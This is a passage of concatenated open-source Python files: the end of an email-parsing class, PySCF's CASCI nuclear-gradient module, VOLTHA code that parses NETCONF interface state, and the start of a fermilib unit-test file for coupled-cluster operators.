addresses in each message, a malicious relay can easily alter that.
Therefore we cannot simply take the first IP in
the chain. Instead, our method is as follows.
First we trust the sender IP reported by our mail server in the
Received headers, and if the previous relay IP address is on our trust
list (e.g. other well-known mail services), we continue to
follow the previous Received line, till we reach the first unrecognized
IP address in the email header.
From article Characterizing Botnets from Email Spam Records:
Li Zhuang, J. D. Tygar
In our case we trust only our mail server with the trust string.
Args:
trust (string): String that identify our mail server
Returns:
string with the ip address
"""
log.debug("Trust string is {!r}".format(trust))
if not trust.strip():
return
received = self.message.get_all("received", [])
for i in received:
i = ported_string(i)
if trust in i:
log.debug("Trust string {!r} is in {!r}".format(trust, i))
check = REGXIP.findall(i[0:i.find("by")])
if check:
try:
ip_str = six.text_type(check[-1])
log.debug("Found sender IP {!r} in {!r}".format(
ip_str, i))
ip = ipaddress.ip_address(ip_str)
except ValueError:
return
else:
if not ip.is_private:
log.debug("IP {!r} not private".format(ip_str))
return ip_str
def write_attachments(self, base_path):
""" This method writes the attachments of mail on disk
Arguments:
base_path {str} -- Base path where write the attachments
"""
write_attachments(
attachments=self.attachments,
base_path=base_path)
def __getattr__(self, name):
name = name.strip("_").lower()
name_header = name.replace("_", "-")
# json headers
if name.endswith("_json"):
name = name[:-5]
return json.dumps(getattr(self, name), ensure_ascii=False)
# raw headers
elif name.endswith("_raw"):
name = name[:-4]
raw = self.message.get_all(name)
return json.dumps(raw, ensure_ascii=False)
# object headers
elif name_header in ADDRESSES_HEADERS:
h = decode_header_part(self.message.get(
name_header, six.text_type()))
return email.utils.getaddresses([h])
# others headers
else:
return get_header(self.message, name_header)
@property
def attachments(self):
"""
Return a list of all attachments in the mail
"""
return self._attachments
@property
def received(self):
"""
Return a list of all received headers parsed
"""
output = self.received_raw
return receiveds_parsing(output)
@property
def received_json(self):
"""
Return a JSON of all received headers
"""
return json.dumps(self.received, ensure_ascii=False, indent=2)
@property
def received_raw(self):
"""
Return a list of all received headers in raw format
"""
output = []
for i in self.message.get_all("received", []):
output.append(decode_header_part(i))
return output
@property
def body(self):
"""
Return all text plain and text html parts of mail delimited from string
"--- mail_boundary ---"
"""
return "\n--- mail_boundary ---\n".join(
self.text_plain + self.text_html + self.text_not_managed)
@property
def headers(self):
"""
Return only the headers as Python object
"""
d = {}
for i in self.message.keys():
d[i] = getattr(self, i)
return d
@property
def headers_json(self):
"""
Return the JSON of headers
"""
return json.dumps(self.headers, ensure_ascii=False, indent=2)
@property
def text_plain(self):
"""
Return a list of all text plain parts of email.
"""
return self._text_plain
@property
def text_html(self):
"""
Return a list of all text html parts of email.
"""
return self._text_html
@property
def text_not_managed(self):
"""
Return a list of all text not managed of email.
"""
return self._text_not_managed
@property
def date(self):
"""
Return the mail date in datetime.datetime format and UTC.
"""
date = self.message.get('date')
conv = None
try:
conv, _ = convert_mail_date(date)
finally:
return conv
@property
def timezone(self):
"""
Return timezone. Offset from UTC.
"""
date = self.message.get('date')
timezone = 0
try:
_, timezone = convert_mail_date(date)
finally:
return timezone
@property
def date_json(self):
"""
Return the JSON of date
"""
if self.date:
return json.dumps(self.date.isoformat(), ensure_ascii=False)
@property
def mail(self):
"""
Return the Python object of mail parsed
"""
return self._mail
@property
def mail_json(self):
"""
Return the JSON of mail parsed
"""
if self.mail.get("date"):
self._mail["date"] = self.date.isoformat()
return json.dumps(self.mail, ensure_ascii=False, indent=2)
@property
def mail_partial(self):
"""
Return the Python object of mail parsed
with only the mains headers
"""
return self._mail_partial
@property
def mail_partial_json(self):
"""
Return the JSON of mail parsed partial
"""
if self.mail_partial.get("date"):
self._mail_partial["date"] = self.date.isoformat()
return json.dumps(self.mail_partial, ensure_ascii=False, indent=2)
@property
def defects(self):
"""
The defects property contains a list of
all the problems found when parsing this message.
"""
return self._defects
@property
def defects_categories(self):
"""
Return a set with only defects categories.
"""
return self._defects_categories
@property
def has_defects(self):
"""
Return a boolean: True if mail has defects.
"""
return self._has_defects
@property
def message(self):
"""
email.message.Message class.
"""
return self._message
@property
def message_as_string(self):
"""
Return the entire message flattened as a string.
"""
return self.message.as_string()
@property
def to_domains(self):
"""
Return all domain of 'to' and 'reply-to' email addresses
"""
return get_to_domains(self.to, self.reply_to)
| |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
CASCI analytical nuclear gradients
Ref.
J. Comput. Chem., 5, 589
'''
import sys
import time
from functools import reduce
import numpy
from pyscf import lib
from pyscf import ao2mo
from pyscf.lib import logger
from pyscf.grad import rhf as rhf_grad
from pyscf.grad.mp2 import _shell_prange
from pyscf.scf import cphf
if sys.version_info < (3,):
RANGE_TYPE = list
else:
RANGE_TYPE = range
def grad_elec(mc_grad, mo_coeff=None, ci=None, atmlst=None, verbose=None):
mc = mc_grad.base
if mo_coeff is None: mo_coeff = mc._scf.mo_coeff
if ci is None: ci = mc.ci
time0 = time.clock(), time.time()
log = logger.new_logger(mc_grad, verbose)
mol = mc_grad.mol
ncore = mc.ncore
ncas = mc.ncas
nocc = ncore + ncas
nelecas = mc.nelecas
nao, nmo = mo_coeff.shape
nao_pair = nao * (nao+1) // 2
mo_energy = mc._scf.mo_energy
mo_occ = mo_coeff[:,:nocc]
mo_core = mo_coeff[:,:ncore]
mo_cas = mo_coeff[:,ncore:nocc]
neleca, nelecb = mol.nelec
assert(neleca == nelecb)
orbo = mo_coeff[:,:neleca]
orbv = mo_coeff[:,neleca:]
casdm1, casdm2 = mc.fcisolver.make_rdm12(ci, ncas, nelecas)
dm_core = numpy.dot(mo_core, mo_core.T) * 2
dm_cas = reduce(numpy.dot, (mo_cas, casdm1, mo_cas.T))
aapa = ao2mo.kernel(mol, (mo_cas, mo_cas, mo_coeff, mo_cas), compact=False)
aapa = aapa.reshape(ncas,ncas,nmo,ncas)
vj, vk = mc._scf.get_jk(mol, (dm_core, dm_cas))
h1 = mc.get_hcore()
vhf_c = vj[0] - vk[0] * .5
vhf_a = vj[1] - vk[1] * .5
# Imat = h1_{pi} gamma1_{iq} + h2_{pijk} gamma_{iqkj}
Imat = numpy.zeros((nmo,nmo))
Imat[:,:nocc] = reduce(numpy.dot, (mo_coeff.T, h1 + vhf_c + vhf_a, mo_occ)) * 2
Imat[:,ncore:nocc] = reduce(numpy.dot, (mo_coeff.T, h1 + vhf_c, mo_cas, casdm1))
Imat[:,ncore:nocc] += lib.einsum('uviw,vuwt->it', aapa, casdm2)
aapa = vj = vk = vhf_c = vhf_a = h1 = None
ee = mo_energy[:,None] - mo_energy
zvec = numpy.zeros_like(Imat)
zvec[:ncore,ncore:neleca] = Imat[:ncore,ncore:neleca] / -ee[:ncore,ncore:neleca]
zvec[ncore:neleca,:ncore] = Imat[ncore:neleca,:ncore] / -ee[ncore:neleca,:ncore]
zvec[nocc:,neleca:nocc] = Imat[nocc:,neleca:nocc] / -ee[nocc:,neleca:nocc]
zvec[neleca:nocc,nocc:] = Imat[neleca:nocc,nocc:] / -ee[neleca:nocc,nocc:]
zvec_ao = reduce(numpy.dot, (mo_coeff, zvec+zvec.T, mo_coeff.T))
vhf = mc._scf.get_veff(mol, zvec_ao) * 2
xvo = reduce(numpy.dot, (orbv.T, vhf, orbo))
xvo += Imat[neleca:,:neleca] - Imat[:neleca,neleca:].T
def fvind(x):
x = x.reshape(xvo.shape)
dm = reduce(numpy.dot, (orbv, x, orbo.T))
v = mc._scf.get_veff(mol, dm + dm.T)
v = reduce(numpy.dot, (orbv.T, v, orbo))
return v * 2
dm1resp = cphf.solve(fvind, mo_energy, mc._scf.mo_occ, xvo, max_cycle=30)[0]
zvec[neleca:,:neleca] = dm1resp
zeta = numpy.einsum('ij,j->ij', zvec, mo_energy)
zeta = reduce(numpy.dot, (mo_coeff, zeta, mo_coeff.T))
zvec_ao = reduce(numpy.dot, (mo_coeff, zvec+zvec.T, mo_coeff.T))
p1 = numpy.dot(mo_coeff[:,:neleca], mo_coeff[:,:neleca].T)
vhf_s1occ = reduce(numpy.dot, (p1, mc._scf.get_veff(mol, zvec_ao), p1))
Imat[:ncore,ncore:neleca] = 0
Imat[ncore:neleca,:ncore] = 0
Imat[nocc:,neleca:nocc] = 0
Imat[neleca:nocc,nocc:] = 0
Imat[neleca:,:neleca] = Imat[:neleca,neleca:].T
im1 = reduce(numpy.dot, (mo_coeff, Imat, mo_coeff.T))
casci_dm1 = dm_core + dm_cas
hf_dm1 = mc._scf.make_rdm1(mo_coeff, mc._scf.mo_occ)
hcore_deriv = mc_grad.hcore_generator(mol)
s1 = mc_grad.get_ovlp(mol)
diag_idx = numpy.arange(nao)
diag_idx = diag_idx * (diag_idx+1) // 2 + diag_idx
casdm2_cc = casdm2 + casdm2.transpose(0,1,3,2)
dm2buf = ao2mo._ao2mo.nr_e2(casdm2_cc.reshape(ncas**2,ncas**2), mo_cas.T,
(0, nao, 0, nao)).reshape(ncas**2,nao,nao)
dm2buf = lib.pack_tril(dm2buf)
dm2buf[:,diag_idx] *= .5
dm2buf = dm2buf.reshape(ncas,ncas,nao_pair)
casdm2 = casdm2_cc = None
if atmlst is None:
atmlst = range(mol.natm)
aoslices = mol.aoslice_by_atom()
de = numpy.zeros((len(atmlst),3))
max_memory = mc_grad.max_memory - lib.current_memory()[0]
blksize = int(max_memory*.9e6/8 / ((aoslices[:,3]-aoslices[:,2]).max()*nao_pair))
blksize = min(nao, max(2, blksize))
for k, ia in enumerate(atmlst):
shl0, shl1, p0, p1 = aoslices[ia]
h1ao = hcore_deriv(ia)
de[k] += numpy.einsum('xij,ij->x', h1ao, casci_dm1)
de[k] += numpy.einsum('xij,ij->x', h1ao, zvec_ao)
vhf1 = numpy.zeros((3,nao,nao))
q1 = 0
for b0, b1, nf in _shell_prange(mol, 0, mol.nbas, blksize):
q0, q1 = q1, q1 + nf
dm2_ao = lib.einsum('ijw,pi,qj->pqw', dm2buf, mo_cas[p0:p1], mo_cas[q0:q1])
shls_slice = (shl0,shl1,b0,b1,0,mol.nbas,0,mol.nbas)
eri1 = mol.intor('int2e_ip1', comp=3, aosym='s2kl',
shls_slice=shls_slice).reshape(3,p1-p0,nf,nao_pair)
de[k] -= numpy.einsum('xijw,ijw->x', eri1, dm2_ao) * 2
for i in range(3):
eri1tmp = lib.unpack_tril(eri1[i].reshape((p1-p0)*nf,-1))
eri1tmp = eri1tmp.reshape(p1-p0,nf,nao,nao)
de[k,i] -= numpy.einsum('ijkl,ij,kl', eri1tmp, hf_dm1[p0:p1,q0:q1], zvec_ao) * 2
de[k,i] -= numpy.einsum('ijkl,kl,ij', eri1tmp, hf_dm1, zvec_ao[p0:p1,q0:q1]) * 2
de[k,i] += numpy.einsum('ijkl,il,kj', eri1tmp, hf_dm1[p0:p1], zvec_ao[q0:q1])
de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, hf_dm1[q0:q1], zvec_ao[p0:p1])
#:vhf1c, vhf1a = mc_grad.get_veff(mol, (dm_core, dm_cas))
#:de[k] += numpy.einsum('xij,ij->x', vhf1c[:,p0:p1], casci_dm1[p0:p1]) * 2
#:de[k] += numpy.einsum('xij,ij->x', vhf1a[:,p0:p1], dm_core[p0:p1]) * 2
de[k,i] -= numpy.einsum('ijkl,lk,ij', eri1tmp, dm_core[q0:q1], casci_dm1[p0:p1]) * 2
de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, dm_core[q0:q1], casci_dm1[p0:p1])
de[k,i] -= numpy.einsum('ijkl,lk,ij', eri1tmp, dm_cas[q0:q1], dm_core[p0:p1]) * 2
de[k,i] += numpy.einsum('ijkl,jk,il', eri1tmp, dm_cas[q0:q1], dm_core[p0:p1])
eri1 = eri1tmp = None
de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], im1[p0:p1])
de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], im1[:,p0:p1])
de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], zeta[p0:p1]) * 2
de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], zeta[:,p0:p1]) * 2
de[k] -= numpy.einsum('xij,ij->x', s1[:,p0:p1], vhf_s1occ[p0:p1]) * 2
de[k] -= numpy.einsum('xij,ji->x', s1[:,p0:p1], vhf_s1occ[:,p0:p1]) * 2
log.timer('CASCI nuclear gradients', *time0)
return de
def as_scanner(mcscf_grad, state=None):
'''Generating a nuclear gradients scanner/solver (for geometry optimizer).
The returned solver is a function. This function requires one argument
"mol" as input and returns energy and first order nuclear derivatives.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
nuc-grad object and SCF object (DIIS, conv_tol, max_memory etc) are
automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
Examples:
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1.1', verbose=0)
>>> mc_grad_scanner = mcscf.CASCI(scf.RHF(mol), 4, 4).nuc_grad_method().as_scanner()
>>> etot, grad = mc_grad_scanner(gto.M(atom='N 0 0 0; N 0 0 1.1'))
>>> etot, grad = mc_grad_scanner(gto.M(atom='N 0 0 0; N 0 0 1.5'))
'''
from pyscf import gto
from pyscf.mcscf.addons import StateAverageMCSCFSolver
if isinstance(mcscf_grad, lib.GradScanner):
return mcscf_grad
if (state is not None and
isinstance(mcscf_grad.base, StateAverageMCSCFSolver)):
raise RuntimeError('State-Average MCSCF Gradients does not support '
'state-specific nuclear gradients.')
logger.info(mcscf_grad, 'Create scanner for %s', mcscf_grad.__class__)
class CASCI_GradScanner(mcscf_grad.__class__, lib.GradScanner):
def __init__(self, g):
lib.GradScanner.__init__(self, g)
def __call__(self, mol_or_geom, state=state, **kwargs):
if isinstance(mol_or_geom, gto.Mole):
mol = mol_or_geom
else:
mol = self.mol.set_geom_(mol_or_geom, inplace=False)
if state is None:
state = self.state
mc_scanner = self.base
# TODO: Check root flip
e_tot = mc_scanner(mol)
ci = mc_scanner.ci
if isinstance(mc_scanner, StateAverageMCSCFSolver):
e_tot = mc_scanner.e_average
elif not isinstance(e_tot, float):
if state >= mc_scanner.fcisolver.nroots:
raise ValueError('State ID greater than the number of CASCI roots')
e_tot = e_tot[state]
# target at a specific state, to avoid overwriting self.state
# in self.kernel
ci = ci[state]
self.mol = mol
de = self.kernel(ci=ci, state=state, **kwargs)
return e_tot, de
return CASCI_GradScanner(mcscf_grad)
class Gradients(rhf_grad.GradientsBasics):
'''Non-relativistic restricted Hartree-Fock gradients'''
def __init__(self, mc):
from pyscf.mcscf.addons import StateAverageMCSCFSolver
if isinstance(mc, StateAverageMCSCFSolver):
self.state = None # not a specific state
else:
self.state = 0 # of which the gradients to be computed.
rhf_grad.GradientsBasics.__init__(self, mc)
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('\n')
if not self.base.converged:
log.warn('Ground state %s not converged', self.base.__class__)
log.info('******** %s for %s ********',
self.__class__, self.base.__class__)
if self.state is None:
weights = self.base.weights
log.info('State-average gradients over %d states with weights %s',
len(weights), weights)
elif self.state != 0 and self.base.fcisolver.nroots > 1:
log.info('State ID = %d', self.state)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
return self
grad_elec = grad_elec
def kernel(self, mo_coeff=None, ci=None, atmlst=None,
state=None, verbose=None):
log = logger.new_logger(self, verbose)
if ci is None: ci = self.base.ci
if self.state is None: # state average MCSCF calculations
assert(state is None)
elif isinstance(ci, (list, tuple, RANGE_TYPE)):
if state is None:
state = self.state
else:
self.state = state
ci = ci[state]
log.info('Multiple roots are found in CASCI solver. '
'Nuclear gradients of root %d are computed.', state)
if atmlst is None:
atmlst = self.atmlst
else:
self.atmlst = atmlst
if self.verbose >= logger.WARN:
self.check_sanity()
if self.verbose >= logger.INFO:
self.dump_flags()
de = self.grad_elec(mo_coeff, ci, atmlst, log)
self.de = de = de + self.grad_nuc(atmlst=atmlst)
if self.mol.symmetry:
self.de = self.symmetrize(self.de, atmlst)
self._finalize()
return self.de
# Initialize hcore_deriv with the underlying SCF object because some
# extensions (e.g. x2c, QM/MM, solvent) modifies the SCF object only.
def hcore_generator(self, mol=None):
mf_grad = self.base._scf.nuc_grad_method()
return mf_grad.hcore_generator(mol)
# Calling the underlying SCF nuclear gradients because it may be modified
# by external modules (e.g. QM/MM, solvent)
def grad_nuc(self, mol=None, atmlst=None):
mf_grad = self.base._scf.nuc_grad_method()
return mf_grad.grad_nuc(mol, atmlst)
def _finalize(self):
if self.verbose >= logger.NOTE:
if self.state is None:
logger.note(self, '--------- %s gradients ----------',
self.base.__class__.__name__)
else:
logger.note(self, '--------- %s gradients for state %d ----------',
self.base.__class__.__name__, self.state)
self._write(self.mol, self.de, self.atmlst)
logger.note(self, '----------------------------------------------')
as_scanner = as_scanner
Grad = Gradients
from pyscf import mcscf
mcscf.casci.CASCI.Gradients = lib.class_as_method(Gradients)
if __name__ == '__main__':
from pyscf import gto
from pyscf import scf
from pyscf import mcscf
mol = gto.Mole()
mol.atom = 'N 0 0 0; N 0 0 1.2; H 1 1 0; H 1 1 1.2'
mol.build()
mf = scf.RHF(mol).run(conv_tol=1e-14)
mc = mcscf.CASCI(mf, 4, 4).run()
g1 = mc.Gradients().kernel()
print(lib.finger(g1) - -0.066025991364829367)
mcs = mc.as_scanner()
mol.set_geom_('N 0 0 0; N 0 0 1.201; H 1 1 0; H 1 1 1.2')
e1 = mcs(mol)
mol.set_geom_('N 0 0 0; N 0 0 1.199; H 1 1 0; H 1 1 1.2')
e2 = mcs(mol)
print(g1[1,2], (e1-e2)/0.002*lib.param.BOHR)
| |
# CCopyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet.defer import inlineCallbacks, returnValue
import xmltodict
import structlog
from voltha.protos.openflow_13_pb2 import OFPPF_1GB_FD, OFPPF_10GB_FD, OFPPF_40GB_FD, OFPPF_100GB_FD
from voltha.protos.openflow_13_pb2 import OFPPF_FIBER, OFPPF_COPPER
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPC_PORT_DOWN, OFPPS_LINK_DOWN, OFPPF_OTHER
from voltha.protos.common_pb2 import OperStatus, AdminState
log = structlog.get_logger()
_ietf_interfaces_config_rpc = """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<interfaces xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
<interface/>
</interfaces>
</filter>
"""
_ietf_interfaces_state_rpc = """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<interfaces-state xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
<interface>
<name/>
<type/>
<admin-status/>
<oper-status/>
<last-change/>
<phys-address/>
<speed/>
</interface>
</interfaces-state>
</filter>
"""
_allowed_with_default_types = ['report-all', 'report-all-tagged', 'trim', 'explicit']
# TODO: Centralize the item below as a function in a core util module
def _with_defaults(default_type=None):
if default_type is None:
return ""
assert(default_type in _allowed_with_default_types)
return """
<with-defaults xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults">
{}</with-defaults>""".format(default_type)
class IetfInterfacesConfig(object):
def __init__(self, session):
"""
:param session: this should be a netconf session
"""
self._session = session
@inlineCallbacks
def get_config(self, source='running', with_defaults=None):
filter = _ietf_interfaces_config_rpc + _with_defaults(with_defaults)
request = self._session.get(source, filter=filter)
rpc_reply = yield request
returnValue(rpc_reply)
def get_interfaces(self, rpc_reply, interface_type=None):
"""
Get the physical entities of a particular type
:param rpc_reply: Reply from previous get or request
:param interface_type: (String or List) The type of interface (case-insensitive)
:return: list) of OrderDict interface entries
"""
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['interfaces']
if interface_type is None:
return entries
# for entry in entries:
# import pprint
# log.info(pprint.PrettyPrinter(indent=2).pformat(entry))
def _matches(entry, value):
if 'type' in entry and '#text' in entry['type']:
text_val = entry['type']['#text'].lower()
if isinstance(value, list):
return any(v.lower() in text_val for v in value)
return value.lower() in text_val
return False
return [entry for entry in entries if _matches(entry, interface_type)]
class IetfInterfacesState(object):
def __init__(self, session):
self._session = session
@inlineCallbacks
def get_state(self):
try:
request = self._session.get(_ietf_interfaces_state_rpc)
rpc_reply = yield request
returnValue(rpc_reply)
except Exception as e:
log.exception('get_state', e=e)
raise
@staticmethod
def get_interfaces(self, rpc_reply, key='type', key_value=None):
"""
Get the physical entities of a particular type
:param key_value: (String or List) The type of interface (case-insensitive)
:return: list) of OrderDict interface entries
"""
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['interfaces-state']['interface']
if key_value is None:
return entries
for entry in entries:
import pprint
log.info(pprint.PrettyPrinter(indent=2).pformat(entry))
def _matches(entry, key, value):
if key in entry and '#text' in entry[key]:
text_val = entry[key]['#text'].lower()
if isinstance(value, list):
return any(v.lower() in text_val for v in value)
return value.lower() in text_val
return False
return [entry for entry in entries if _matches(entry, key, key_value)]
@staticmethod
def _get_admin_state(entry):
state_map = {
'up': AdminState.ENABLED,
'down': AdminState.DISABLED,
'testing': AdminState.DISABLED
}
return state_map.get(entry.get('admin-status', 'down'),
AdminState.UNKNOWN)
@staticmethod
def _get_oper_status(entry):
state_map = {
'up': OperStatus.ACTIVE,
'down': OperStatus.FAILED,
'testing': OperStatus.TESTING,
'unknown': OperStatus.UNKNOWN,
'dormant': OperStatus.DISCOVERED,
'not-present': OperStatus.UNKNOWN,
'lower-layer-down': OperStatus.FAILED
}
return state_map.get(entry.get('oper-status', 'down'),
OperStatus.UNKNOWN)
@staticmethod
def _get_mac_addr(entry):
mac_addr = entry.get('phys-address', None)
if mac_addr is None:
import random
# TODO: Get with qumram team about phys addr
mac_addr = '08:00:{}{}:{}{}:{}{}:00'.format(random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9),
random.randint(0, 9))
return mac_addr
@staticmethod
def _get_speed_value(entry):
speed = entry.get('speed') or IetfInterfacesState._get_speed_via_name(entry.get('name'))
if isinstance(speed, str):
return long(speed)
return speed
@staticmethod
def _get_speed_via_name(name):
speed_map = {
'terabit': 1000000000000,
'hundred-gigabit': 100000000000,
'fourty-gigabit': 40000000000,
'ten-gigabit': 10000000000,
'gigabit': 1000000000,
}
for n,v in speed_map.iteritems():
if n in name.lower():
return v
return 0
@staticmethod
def _get_of_state(entry):
# If port up and ready: OFPPS_LIVE
# If port config bit is down: OFPPC_PORT_DOWN
# If port state bit is down: OFPPS_LINK_DOWN
# if IetfInterfacesState._get_admin_state(entry) == AdminState.ENABLED:
# return OFPPS_LIVE \
# if IetfInterfacesState._get_oper_status(entry) == OperStatus.ACTIVE \
# else OFPPS_LINK_DOWN
#
# return OFPPC_PORT_DOWN
# TODO: Update of openflow port state is not supported, so always say we are alive
return OFPPS_LIVE
@staticmethod
def _get_of_capabilities(entry):
# The capabilities field is a bitmap that uses a combination of the following flags :
# Capabilities supported by the datapath
# enum ofp_capabilities {
# OFPC_FLOW_STATS = 1 << 0, /* Flow statistics. */
# OFPC_TABLE_STATS = 1 << 1, /* Table statistics. */
# OFPC_PORT_STATS = 1 << 2, /* Port statistics. */
# OFPC_GROUP_STATS = 1 << 3, /* Group statistics. */
# OFPC_IP_REASM = 1 << 5, /* Can reassemble IP fragments. */
# OFPC_QUEUE_STATS = 1 << 6, /* Queue statistics. */
# OFPC_PORT_BLOCKED = 1 << 8, /* Switch will block looping ports. */
# OFPC_BUNDLES = 1 << 9, /* Switch supports bundles. */
# OFPC_FLOW_MONITORING = 1 << 10, /* Switch supports flow monitoring. */
# }
# enum ofp_port_features {
# OFPPF_10MB_HD = 1 << 0, /* 10 Mb half-duplex rate support. */
# OFPPF_10MB_FD = 1 << 1, /* 10 Mb full-duplex rate support. */
# OFPPF_100MB_HD = 1 << 2, /* 100 Mb half-duplex rate support. */
# OFPPF_100MB_FD = 1 << 3, /* 100 Mb full-duplex rate support. */
# OFPPF_1GB_HD = 1 << 4, /* 1 Gb half-duplex rate support. */
# OFPPF_1GB_FD = 1 << 5, /* 1 Gb full-duplex rate support. */
# OFPPF_10GB_FD = 1 << 6, /* 10 Gb full-duplex rate support. */
# OFPPF_40GB_FD = 1 << 7, /* 40 Gb full-duplex rate support. */
# OFPPF_100GB_FD = 1 << 8, /* 100 Gb full-duplex rate support. */
# OFPPF_1TB_FD = 1 << 9, /* 1 Tb full-duplex rate support. */
# OFPPF_OTHER = 1 << 10, /* Other rate, not in the list. */
# OFPPF_COPPER = 1 << 11, /* Copper medium. */
# OFPPF_FIBER = 1 << 12, /* Fiber medium. */
# OFPPF_AUTONEG = 1 << 13, /* Auto-negotiation. */
# OFPPF_PAUSE = 1 << 14, /* Pause. */
# OFPPF_PAUSE_ASYM = 1 << 15 /* Asymmetric pause. */
# }
# TODO: Look into adtran-physical-entities and decode xSFP type any other settings
return IetfInterfacesState._get_of_speed(entry) | OFPPF_FIBER
@staticmethod
def _get_of_speed(entry):
speed = IetfInterfacesState._get_speed_value(entry)
speed_map = {
1000000000: OFPPF_1GB_FD,
10000000000: OFPPF_10GB_FD,
40000000000: OFPPF_40GB_FD,
100000000000: OFPPF_100GB_FD,
}
# return speed_map.get(speed, OFPPF_OTHER)
# TODO: For now, force 100 GB
return OFPPF_100GB_FD
@staticmethod
def _get_port_number(name, if_index):
import re
formats = [
'xpon \d/{1,2}\d', # OLT version 3 (Feb 2018++)
'Hundred-Gigabit-Ethernet \d/\d/{1,2}\d', # OLT version 2
'XPON \d/\d/{1,2}\d', # OLT version 2
'hundred-gigabit-ethernet \d/{1,2}\d', # OLT version 1
'channel-termination {1,2}\d', # OLT version 1
]
p2 = re.compile('\d+')
for regex in formats:
p = re.compile(regex, re.IGNORECASE)
match = p.match(name)
if match is not None:
return int(p2.findall(name)[-1])
@staticmethod
def get_port_entries(rpc_reply, port_type):
"""
Get the port entries that make up the northbound and
southbound interfaces
:param rpc_reply:
:param port_type:
:return:
"""
ports = dict()
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['interfaces-state']['interface']
if not isinstance(entries, list):
entries = [entries]
port_entries = [entry for entry in entries if 'name' in entry and
port_type.lower() in entry['name'].lower()]
for entry in port_entries:
port = {
'port_no': IetfInterfacesState._get_port_number(entry.get('name'),
entry.get('ifindex')),
'name': entry.get('name', 'unknown'),
'ifIndex': entry.get('ifIndex'),
# 'label': None,
'mac_address': IetfInterfacesState._get_mac_addr(entry),
'admin_state': IetfInterfacesState._get_admin_state(entry),
'oper_status': IetfInterfacesState._get_oper_status(entry),
'ofp_state': IetfInterfacesState._get_of_state(entry),
'ofp_capabilities': IetfInterfacesState._get_of_capabilities(entry),
'current_speed': IetfInterfacesState._get_of_speed(entry),
'max_speed': IetfInterfacesState._get_of_speed(entry),
}
port_no = port['port_no']
if port_no not in ports:
ports[port_no] = port
else:
ports[port_no].update(port)
return ports
| |
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to test unitary coupled cluster operators."""
from __future__ import absolute_import
import unittest
from numpy.random import randn
import itertools
import fermilib
import fermilib.ops
from fermilib.ops import FermionOperator
import fermilib.utils
from fermilib.circuits._graph import (Graph, Node)
from fermilib.circuits._unitary_cc import *
from projectq.ops import (All, Measure, TimeEvolution,
QubitOperator, X)
class UnitaryCC(unittest.TestCase):
def test_uccsd_anti_hermitian(self):
"""Test operators are anti-Hermitian independent of inputs"""
test_orbitals = 4
single_amplitudes = randn(*(test_orbitals,) * 2)
double_amplitudes = randn(*(test_orbitals,) * 4)
generator = uccsd_operator(single_amplitudes, double_amplitudes)
conj_generator = fermilib.ops.hermitian_conjugated(generator)
self.assertTrue(generator.isclose(-1. * conj_generator))
def test_uccsd_singlet_anti_hermitian(self):
"""Test that the singlet version is anti-Hermitian"""
test_orbitals = 8
test_electrons = 4
packed_amplitude_size = uccsd_singlet_paramsize(test_orbitals,
test_electrons)
packed_amplitudes = randn(int(packed_amplitude_size))
generator = uccsd_singlet_operator(packed_amplitudes,
test_orbitals,
test_electrons)
conj_generator = fermilib.ops.hermitian_conjugated(generator)
self.assertTrue(generator.isclose(-1. * conj_generator))
def test_uccsd_singlet_build(self):
"""Test a specific build of the UCCSD singlet operator"""
initial_amplitudes = [-1.14941450e-08, 5.65340614e-02]
n_orbitals = 4
n_electrons = 2
generator = uccsd_singlet_operator(initial_amplitudes,
n_orbitals,
n_electrons)
test_generator = (0.0565340614 * FermionOperator("2^ 0 3^ 1") +
1.1494145e-08 * FermionOperator("1^ 3") +
0.0565340614 * FermionOperator("3^ 1 2^ 0") +
0.0565340614 * FermionOperator("2^ 0 2^ 0") +
